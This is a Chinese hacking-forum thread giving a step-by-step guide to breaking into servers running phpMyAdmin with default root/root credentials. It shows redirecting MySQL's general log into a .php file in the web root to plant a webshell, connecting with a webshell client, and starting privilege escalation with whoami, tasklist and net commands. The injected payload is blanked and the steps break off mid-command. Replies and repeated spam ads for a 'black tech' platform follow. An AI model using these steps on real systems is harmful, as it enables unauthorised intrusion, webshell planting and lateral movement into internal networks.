黑客入侵数据库指令

[复制链接]
查看603 | 回复2 | 2022-8-5 00:00:48 | 显示全部楼层 |阅读模式
phpMyAdmin弱口令,从数据库杀到内网一条龙
超超超超超详细

ps:不混娱乐圈,mors是我大哥,不服喷他

什么是phpMyAdmin?

phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其要处理大量资料的汇入及汇出更为方便。其中一个更大的优势在于由于phpMyAdmin跟其他PHP程式一样在网页服务器上执行,但是您可以在任何地方使用这些程式产生的HTML页面,也就是于远端管理MySQL数据库,方便的建立、修改、删除数据库及资料表。也可借由phpMyAdmin建立常用的php语法,方便编写网页时所需要的sql语法正确性。

以上这些都不重要,重要的是能干什么?[滑稽]

phpMyAdmin在配置的时候,如果不去修改,默认账号密码就是root/root
什么?你问我他为什么不去修改?
不是每个人都懂这些的好吧?
看看有多少傻瓜式搭建网站的帖子就知道了
当初在帮别人改代码的时候
惊奇的发现源码里面有木马!
更可笑的是,还跟我说是特意这样写的!
着实把我逗笑了
偏偏小白们还看不出来

好了好了,言归正传

弱口令进了数据库我们能干嘛呢?
当然是拿shell啊

先找网站的根目录
一个是是否开启,一个是写入路径
general_log          一般是off,改成on
general_log_file   C:\phpStudy\WWW\log.php
改成你喜欢的名字,比如:
general_log_file   C:\phpStudy\WWW\123.php

执行一句话:
select ;
这样木马就被写入了123.php里面
密码是666,菜刀连接
原理就是,你执行的sql语句会被日志记录下来

拿到shell之后呢?当然是提权啦!
用shell打开虚拟终端
1.whoami看看啥权限
(有的是system权限,还有的可能是Administrator,还有比较鸡贼的,看似是Administrator,实际权限低的可怜)

2.tasklist  /svc 找远程服务(Windows远程服务名称为:TermService)记录PID

3.net
aaaa
村长黑科技是专业提供项目资源的服务的村长黑科技平台,如合购网赚项目、引流推广软件、软件程序开发等项目就选村长黑科技平台,参与或发布项目定制各种软件就来村长黑科技平台
无量科技 | 2022-8-5 16:11:14 | 显示全部楼层
为保住菊花,这个一定得回复!
aaaa
村长黑科技是专业提供项目资源的服务的村长黑科技平台,如合购网赚项目、引流推广软件、软件程序开发等项目就选村长黑科技平台,参与或发布项目定制各种软件就来村长黑科技平台
回复

使用道具 举报

天镜盗梦 | 2022-8-8 19:11:15 | 显示全部楼层
垃圾内容,路过为证。
aaaa
村长黑科技是专业提供项目资源的服务的村长黑科技平台,如合购网赚项目、引流推广软件、软件程序开发等项目就选村长黑科技平台,参与或发布项目定制各种软件就来村长黑科技平台
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则